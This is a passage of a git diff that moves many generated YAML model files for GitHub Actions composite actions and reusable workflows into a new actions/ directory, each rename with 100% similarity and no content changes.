a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/actions/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml rename to actions/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/actions/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml rename to actions/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/actions/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml rename to actions/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/actions/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml rename to actions/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/actions/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml rename to actions/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/actions/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml rename to actions/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/actions/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml rename to actions/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/actions/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml rename to actions/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/actions/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml rename to actions/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/actions/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml rename to actions/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/actions/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/actions/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml rename to actions/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/actions/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml rename to actions/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/actions/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml rename to actions/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/actions/ql/lib/ext/generated/composite-actions/stellar_go.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/stellar_go.model.yml rename to actions/ql/lib/ext/generated/composite-actions/stellar_go.model.yml diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/actions/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml rename to actions/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/actions/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/subquery_subql.model.yml rename to actions/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml rename to actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml rename to actions/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/actions/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml rename to actions/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/actions/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml rename to actions/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/actions/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml rename to actions/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/actions/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml rename to actions/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/actions/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml rename to actions/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/actions/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml rename to actions/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/actions/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml rename to actions/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/actions/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml rename to actions/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml rename to actions/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/actions/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml rename to actions/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/actions/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml rename to actions/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/actions/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml rename to actions/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/actions/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml rename to actions/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/actions/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml rename to actions/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/actions/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml rename to actions/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/actions/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml rename to actions/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/actions/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml rename to actions/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/actions/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml rename to actions/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/actions/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml rename to actions/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/actions/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml rename to actions/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/actions/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml rename to actions/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/actions/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml rename to actions/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/actions/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml rename to actions/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/actions/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml rename to actions/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/actions/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml rename to actions/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml similarity index 100% rename from ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml rename to actions/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml similarity index 100% rename from 